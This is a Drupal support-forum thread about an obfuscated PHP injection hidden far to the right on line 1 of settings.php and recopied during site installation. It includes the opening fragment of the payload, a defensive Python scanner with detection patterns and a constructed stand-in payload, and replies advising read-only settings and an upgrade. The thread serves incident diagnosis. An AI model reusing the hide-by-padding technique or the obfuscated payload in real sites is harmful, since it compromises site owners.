I keep a server on AWS.
I have a computer with a multi-site setup.
I initially installed a regular Drupal and added subdirectories under …/sites/ with the name of the domain, such as “sample.com”. I keep installing websites in the same way, and until now everything went OK.
In the last few days I tried to install additional sites and came across a message (warning) about something in line 1 of settings.php.
settings.php contains on line 1 only “<?php”, but looking deeper I found that starting at line 1, col 519, there is a long line of code (placed there starting at col 519 to hide it from an unsuspecting eye), and it runs all the way to col 11679 (a very long line!).
The beginning of it looks like this:
$GLOBALS['m152ad'];global$m152ad;$m152ad=$GLOBALS;$m152ad['t94f724b']="\x5a\x30\x66\x53\x6e\x37\x61\x49\x7e\x33\x27\xa\x45\x62\x39\x73\x4e\x34\x5c\x2b\x6b\x36\x58\x5f
My settings.php is a copy of “example.sites.php”, and I found that this was also infected with the same long string.
I cleaned both files and removed the extra code.
Upon installation I get the warning again and the long string is back.
If I clean the string before running the site for the first time, the site is clean.
Before the installation step I cleaned the file and it got infected during the installation; from this I conclude that the code is there somewhere and is being copied during the installation.
I need to know where it is or where to look for it so I can remove it from my system.

Hope someone can help.
Best regards
Shimon Dekel
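
One way to look for other copies of the injected line is to scan every PHP file under the Drupal root for the traits described in the post: code pushed far to the right of the opening `<?php` tag, a single very long line, and a dense run of `\x..` escapes. This is an added example, not part of the original post or of Drupal; the thresholds, the file-extension list, the whitespace padding and the sample files built in `demo()` are assumptions.

```python
import os
import pathlib
import re
import tempfile

HEX_ESCAPE = re.compile(rb'\\x[0-9a-fA-F]{1,2}')
# Assumption: the gap between "<?php" and the hidden code is spaces or tabs.
PADDED_OPEN_TAG = re.compile(rb'^<\?php[ \t]{100,}\S')
PHP_EXTENSIONS = ('.php', '.inc', '.module', '.install')
MAX_LINE = 2000       # assumed threshold; hand-written PHP lines are far shorter
MIN_HEX_ESCAPES = 50  # assumed threshold for a mostly hex-encoded line

def scan_file(path):
    """Return a list of (line_number, reason) findings for one file."""
    findings = []
    with open(path, 'rb') as handle:
        for number, line in enumerate(handle, start=1):
            line = line.rstrip(b'\r\n')
            if PADDED_OPEN_TAG.match(line):
                findings.append((number, 'code hidden after padded <?php tag'))
            if len(line) > MAX_LINE:
                findings.append((number, 'line of %d bytes' % len(line)))
            if len(HEX_ESCAPE.findall(line)) >= MIN_HEX_ESCAPES:
                findings.append((number, 'dense hex-escaped string'))
    return findings

def scan_tree(root):
    """Walk root and map each suspicious PHP file to its findings."""
    report = {}
    for directory, _, names in os.walk(root):
        for name in names:
            if name.endswith(PHP_EXTENSIONS):
                path = os.path.join(directory, name)
                findings = scan_file(path)
                if findings:
                    report[path] = findings
    return report

def demo():
    """Scan a constructed tree: one clean file, one with a padded payload."""
    with tempfile.TemporaryDirectory() as root:
        site = pathlib.Path(root, 'sites', 'sample.com')
        site.mkdir(parents=True)
        (site / 'clean.php').write_bytes(b'<?php\n$conf = array();\n')
        # Constructed stand-in: 513 spaces put the code at column 519.
        payload = b'<?php' + b' ' * 513 + b'$x="' + b'\\x41' * 600 + b'";\n'
        (site / 'settings.php').write_bytes(payload)
        return {os.path.basename(path): [reason for _, reason in found]
                for path, found in scan_tree(root).items()}
```

Calling `scan_tree()` on the Drupal root lists every file that carries such a line, including any copy that is being written into new sites during installation.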

Comments

nevets’s picture

Is settings.php writable? (It shouldn't be.)

ShimonDekel’s picture

It is no longer writable.
But how do I get rid of it? It comes back upon installing the site, so apparently it is somewhere deep in there.

yelvington’s picture

ShimonDekel’s picture

I will try all of them.

yelvington’s picture

carloswwe’s picture

Hi,

There was a Drupal security vulnerability prior to the Drupal 7.34 / 6.34 release. I would first upgrade to Drupal 7.34/6.34 and then fix the settings.php file.